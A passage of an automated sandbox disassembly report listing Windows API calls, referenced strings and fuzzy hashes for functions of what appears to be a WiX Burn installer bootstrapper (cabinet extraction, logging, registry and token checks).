                                                                                                                  • Part of subcall function 00231175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0023111A,cabinet.dll,00000009,?,?,00000000), ref: 00231186
                                                                                                                  • Part of subcall function 00231175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0023111A,cabinet.dll,00000009,?,?,00000000), ref: 00231191
                                                                                                                  • Part of subcall function 00231175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0023119F
                                                                                                                  • Part of subcall function 00231175: GetLastError.KERNEL32(?,?,?,?,?,0023111A,cabinet.dll,00000009,?,?,00000000), ref: 002311BA
                                                                                                                  • Part of subcall function 00231175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002311C2
                                                                                                                  • Part of subcall function 00231175: GetLastError.KERNEL32(?,?,?,?,?,0023111A,cabinet.dll,00000009,?,?,00000000), ref: 002311D7
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,0027B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00231131
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                                                                                • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                                                                • API String ID: 3687706282-3151496603
                                                                                                                • Opcode ID: b00b089d385b06a994563813d107e9e3fb6de0df174efd13c6dfc6c1a226726d
                                                                                                                • Instruction ID: d0aacd8224f9b9e7d8ba0ed04ce8ef60f234da370709ca82d26ade5f874bbdbd
                                                                                                                • Opcode Fuzzy Hash: b00b089d385b06a994563813d107e9e3fb6de0df174efd13c6dfc6c1a226726d
                                                                                                                • Instruction Fuzzy Hash: 692171B192021CABDB119FA4DC59BEEBBB8EF05710F508115FA58B7281D7705934CFA4
                                                                                                                APIs
                                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,0023548E,?,?), ref: 0024EA9D
                                                                                                                • GetLastError.KERNEL32(?,0023548E,?,?), ref: 0024EAAA
                                                                                                                • CreateThread.KERNELBASE ref: 0024EB03
                                                                                                                • GetLastError.KERNEL32(?,0023548E,?,?), ref: 0024EB10
                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,0023548E,?,?), ref: 0024EB4B
                                                                                                                • CloseHandle.KERNEL32(00000000,?,0023548E,?,?), ref: 0024EB6A
                                                                                                                • CloseHandle.KERNELBASE(?,?,0023548E,?,?), ref: 0024EB77
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                                                                • API String ID: 2351989216-3599963359
                                                                                                                • Opcode ID: a298fab572750489a7c865a8919385d0898b210ce8893f9332d666ed47459953
                                                                                                                • Instruction ID: 067276f86c2ae811add692a51c893f361e94d23792ab406fceea31e1278b1226
                                                                                                                • Opcode Fuzzy Hash: a298fab572750489a7c865a8919385d0898b210ce8893f9332d666ed47459953
                                                                                                                • Instruction Fuzzy Hash: 7D31B476D1122ABBEB11DF999C85A9EBAA8FF04350F120165BD04F7280E6309E508BA1
                                                                                                                APIs
                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,74DF2F60,?,?,00235405,002353BD,00000000,00235445), ref: 00251506
                                                                                                                • GetLastError.KERNEL32 ref: 00251519
                                                                                                                • GetExitCodeThread.KERNELBASE(0027B488,?), ref: 0025155B
                                                                                                                • GetLastError.KERNEL32 ref: 00251569
                                                                                                                • ResetEvent.KERNEL32(0027B460), ref: 002515A4
                                                                                                                • GetLastError.KERNEL32 ref: 002515AE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                                                                • API String ID: 2979751695-3400260300
                                                                                                                • Opcode ID: 6a7d0830aa91624b491a00085ab8bc3e9ec606bb4638d711645b20ebfbdd95e0
                                                                                                                • Instruction ID: 12f681785d04b2c7c6105be88718ca72b343618564f869e5b0a070ff632014a4
                                                                                                                • Opcode Fuzzy Hash: 6a7d0830aa91624b491a00085ab8bc3e9ec606bb4638d711645b20ebfbdd95e0
                                                                                                                • Instruction Fuzzy Hash: CC31E2B1A21206ABE710EF659D45BAE77F8EB40301F10405AFD06D61A0FB30DE349B55
                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00232E5F
                                                                                                                • GetLastError.KERNEL32 ref: 00232E69
                                                                                                                • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00232F09
                                                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00232F96
                                                                                                                • GetLastError.KERNEL32 ref: 00232FA3
                                                                                                                • Sleep.KERNEL32(00000064), ref: 00232FB7
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0023301F
                                                                                                                Strings
                                                                                                                • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00232F66
                                                                                                                • pathutil.cpp, xrefs: 00232E8D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                                                                • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                                                                                • API String ID: 3480017824-1101990113
                                                                                                                • Opcode ID: 3ddddc20adbc0bd06f26d3ae0679a2ce5cd4d54bcbc0c6e6b0b3c72484778204
                                                                                                                • Instruction ID: a7a0176f83fbe8c48f8e35c763feb8b0fa3d0469b05e9b583e206bba288f45d7
                                                                                                                • Opcode Fuzzy Hash: 3ddddc20adbc0bd06f26d3ae0679a2ce5cd4d54bcbc0c6e6b0b3c72484778204
                                                                                                                • Instruction Fuzzy Hash: CF7184B2D21239ABDB319FA4DC49BAEB3B8AB08710F1141D5F918E7190D7749E94CF90
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,002353BD,00000000,00235489,00235445,WixBundleUILevel,840F01E8,?,00000001), ref: 0023CC1C
                                                                                                                Strings
                                                                                                                • Payload was not found in container: %ls, xrefs: 0023CD29
                                                                                                                • Failed to concat file paths., xrefs: 0023CCFC
                                                                                                                • Failed to get directory portion of local file path, xrefs: 0023CCF5
                                                                                                                • Failed to ensure directory exists, xrefs: 0023CCEE
                                                                                                                • Failed to get next stream., xrefs: 0023CD03
                                                                                                                • payload.cpp, xrefs: 0023CD1D
                                                                                                                • Failed to find embedded payload: %ls, xrefs: 0023CC48
                                                                                                                • Failed to extract file., xrefs: 0023CCE7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareString
                                                                                                                • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                                                                • API String ID: 1825529933-1711239286
                                                                                                                • Opcode ID: 9e0cf5c045ffe768d6d14dae43aaf2b2d7fb26c5da42e034500bcfec94e3632d
                                                                                                                • Instruction ID: d0a3694d4a45a4c6a3c2681aeb9d0579480b067e0bb6c4d9f37be4251b9c46dd
                                                                                                                • Opcode Fuzzy Hash: 9e0cf5c045ffe768d6d14dae43aaf2b2d7fb26c5da42e034500bcfec94e3632d
                                                                                                                • Instruction Fuzzy Hash: 6941C1B1920229EBCF25DF44CD859AEBBA5BF00710F20816AF819BB251D7709D60DF90
                                                                                                                APIs
                                                                                                                • PeekMessageW.USER32 ref: 002347BB
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 002347C1
                                                                                                                • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0023484F
                                                                                                                Strings
                                                                                                                • wininet.dll, xrefs: 002347EE
                                                                                                                • Failed to start bootstrapper application., xrefs: 0023481D
                                                                                                                • Unexpected return value from message pump., xrefs: 002348A5
                                                                                                                • engine.cpp, xrefs: 0023489B
                                                                                                                • Failed to load UX., xrefs: 00234804
                                                                                                                • Failed to create engine for UX., xrefs: 002347DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$CurrentPeekThread
                                                                                                                • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                                                                                • API String ID: 673430819-2573580774
                                                                                                                • Opcode ID: edb920bcf83df9a7c6bf078608bb366ee2424f3d5eb2493be266d1f0583ab1c2
                                                                                                                • Instruction ID: c6d90fc056a1ca19fe57423de4a6346634cebbb427fbf3c75aba2b9bf29344f0
                                                                                                                • Opcode Fuzzy Hash: edb920bcf83df9a7c6bf078608bb366ee2424f3d5eb2493be266d1f0583ab1c2
                                                                                                                • Instruction Fuzzy Hash: 3741E5B1A20155BFEB15EBA4DC85EBAB36CEF05314F104165F908E7140DB30BD658BA0
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,002347FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0023548E,?), ref: 0023D6DA
                                                                                                                • GetLastError.KERNEL32(?,002347FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0023548E,?,?), ref: 0023D6E7
                                                                                                                • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0023D71F
                                                                                                                • GetLastError.KERNEL32(?,002347FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0023548E,?,?), ref: 0023D72B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                                                                                • API String ID: 1866314245-2276003667
                                                                                                                • Opcode ID: 3b62015570e4045078f93ac56b5c7640c0eafc1e6ae94b0a635ac84f898bfc93
                                                                                                                • Instruction ID: 855ce276afdc620c236ca55fdcfc1f0b903c0d4d45e20859a4aeb61d455953c7
                                                                                                                • Opcode Fuzzy Hash: 3b62015570e4045078f93ac56b5c7640c0eafc1e6ae94b0a635ac84f898bfc93
                                                                                                                • Instruction Fuzzy Hash: B6112BB7AB4732A7D7215A946C09F1BA6946B06721F014525FE58FB1C0DB30DC2086D1
                                                                                                                APIs
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0023F942
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0023F94F
                                                                                                                Strings
                                                                                                                • Failed to format pending restart registry key to read., xrefs: 0023F846
                                                                                                                • %ls.RebootRequired, xrefs: 0023F82F
                                                                                                                • Failed to read Resume value., xrefs: 0023F8D8
                                                                                                                • Resume, xrefs: 0023F8B6
                                                                                                                • Failed to open registration key., xrefs: 0023F8AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                                                                • API String ID: 3535843008-3890505273
                                                                                                                • Opcode ID: 5e9aaf725353e5d689ce15cf7d5a3415ba7402d42faa71674b4f31e0f79cbf1e
                                                                                                                • Instruction ID: 28c3295e8f1e372c2213ab34d2b8b977236278fa2c1818c8d4344fe5886ef66c
                                                                                                                • Opcode Fuzzy Hash: 5e9aaf725353e5d689ce15cf7d5a3415ba7402d42faa71674b4f31e0f79cbf1e
                                                                                                                • Instruction Fuzzy Hash: E5416DB1D21119FFDB519F98EA80BADBBB8FF00310F158176E814AB250C3B1AE61DB40
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(0029B5FC,00000000,?,?,?,00244207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,002354FA,?), ref: 00270533
                                                                                                                • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,0029B5F4,?,00244207,00000000,Setup), ref: 002705D7
                                                                                                                • GetLastError.KERNEL32(?,00244207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,002354FA,?,?,?), ref: 002705E7
                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00244207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,002354FA,?), ref: 00270621
                                                                                                                  • Part of subcall function 00232DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00232F09
                                                                                                                • LeaveCriticalSection.KERNEL32(0029B5FC,?,?,0029B5F4,?,00244207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,002354FA,?), ref: 0027067A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                                                                • String ID: logutil.cpp
                                                                                                                • API String ID: 4111229724-3545173039
                                                                                                                • Opcode ID: e42c2c59cddbfa1e6fec1cfac288b46635ba491b42fd4e317d98941954306864
                                                                                                                • Instruction ID: 65e95dac8f32073c8e2ee011a015af0914c5777b19e64a5d9a53312765c2015b
                                                                                                                • Opcode Fuzzy Hash: e42c2c59cddbfa1e6fec1cfac288b46635ba491b42fd4e317d98941954306864
                                                                                                                • Instruction Fuzzy Hash: CA31E47192022AFBDB129FA1AE9EF6E766CEB00750F418135F908A6160D770DD749FA0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • Failed to write during cabinet extraction., xrefs: 00250C35
                                                                                                                • Unexpected call to CabWrite()., xrefs: 00250BC1
                                                                                                                • cabextract.cpp, xrefs: 00250C2B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                                                                • API String ID: 1970631241-3111339858
                                                                                                                • Opcode ID: d4fc74051129ef680de7762a54757ce8c1a8b8704debc4fbc46aa6d93bdcd54f
                                                                                                                • Instruction ID: dbe8adec714fc9721b4ef9dcfaaa3c9db90f193d3e00323239a45e351f0a3bdd
                                                                                                                • Opcode Fuzzy Hash: d4fc74051129ef680de7762a54757ce8c1a8b8704debc4fbc46aa6d93bdcd54f
                                                                                                                • Instruction Fuzzy Hash: 4721017A520201ABCB10DF5CDCC5D5A77B9FF8A722B21415AFE08C7241EA71DD20CB64
                                                                                                                APIs
                                                                                                                • OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00270897
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,0024769D,00000000), ref: 002708A1
                                                                                                                • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 002708D3
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,0024769D,00000000), ref: 002708EC
                                                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0024769D,00000000), ref: 0027092B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                • String ID: procutil.cpp
                                                                                                                • API String ID: 4040495316-1178289305
                                                                                                                • Opcode ID: 3b491320ae60cfe5f0b90a980ad9e5a04b199441c9c037eeb1c8de84590aa711
                                                                                                                • Instruction ID: 57a5647c4c22a946107bd4062b3ea3d4e376e9d4d2f261d4a2236a51405f6847
                                                                                                                • Opcode Fuzzy Hash: 3b491320ae60cfe5f0b90a980ad9e5a04b199441c9c037eeb1c8de84590aa711
                                                                                                                • Instruction Fuzzy Hash: FB21F932D1012AEBE7219F959848B9EBBB8EF14B10F018055EE1CE7250D3708E14DAD0
                                                                                                                APIs
                                                                                                                • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00250CC4
                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00250CD6
                                                                                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00250CE9
                                                                                                                • CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,002508B1,?,?), ref: 00250CF8
                                                                                                                Strings
                                                                                                                • Invalid operation for this state., xrefs: 00250C9D
                                                                                                                • cabextract.cpp, xrefs: 00250C93
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$File$CloseDateHandleLocal
                                                                                                                • String ID: Invalid operation for this state.$cabextract.cpp
                                                                                                                • API String ID: 609741386-1751360545
                                                                                                                • Opcode ID: d6bab4fc15a711a0751a1b490a4d145da31517c8665f44c4e274332a69d98d11
                                                                                                                • Instruction ID: fe48ffd8b830c2dad46f5ddcf59ccd2f0f990a42baf6d8acd9c97c145bd6e204
                                                                                                                • Opcode Fuzzy Hash: d6bab4fc15a711a0751a1b490a4d145da31517c8665f44c4e274332a69d98d11
                                                                                                                • Instruction Fuzzy Hash: 1C21057282121AAB8710DFA8DC899BABBBCFF053227144257FC14D61D0D770E965CB94
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00273574
                                                                                                                • InterlockedIncrement.KERNEL32(0029B6C8), ref: 00273591
                                                                                                                • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,0029B6B8,?,?,?,?,?,?), ref: 002735AC
                                                                                                                • CLSIDFromProgID.OLE32(MSXML.DOMDocument,0029B6B8,?,?,?,?,?,?), ref: 002735B8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromProg$IncrementInitializeInterlocked
                                                                                                                • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                                                                • API String ID: 2109125048-2356320334
                                                                                                                • Opcode ID: d10ed32f5637c7cd95e7d3fbf038cc652546117d24e4d86ee54c29c6adce4a43
                                                                                                                • Instruction ID: 28d01fdd7074e2f449dbe1063e5dc4cfc9175475a7da2b393d4cf4b55b97f27d
                                                                                                                • Opcode Fuzzy Hash: d10ed32f5637c7cd95e7d3fbf038cc652546117d24e4d86ee54c29c6adce4a43
                                                                                                                • Instruction Fuzzy Hash: 14F0E53076113657E7228BA27E0DB8B2DA9DB85F55F400429EC0CC2050D370D9A186B0
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00274A9D
                                                                                                                • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00274ACA
                                                                                                                • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00274AF6
                                                                                                                • GetLastError.KERNEL32(00000000,0027B7A0,?,00000000,?,00000000,?,00000000), ref: 00274B34
                                                                                                                • GlobalFree.KERNEL32 ref: 00274B65
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$Global$AllocFree
                                                                                                                • String ID: fileutil.cpp
                                                                                                                • API String ID: 1145190524-2967768451
                                                                                                                • Opcode ID: e7d7122604285c81cce8e8302509b5081e80cca385c22a9b83a4893848321ba7
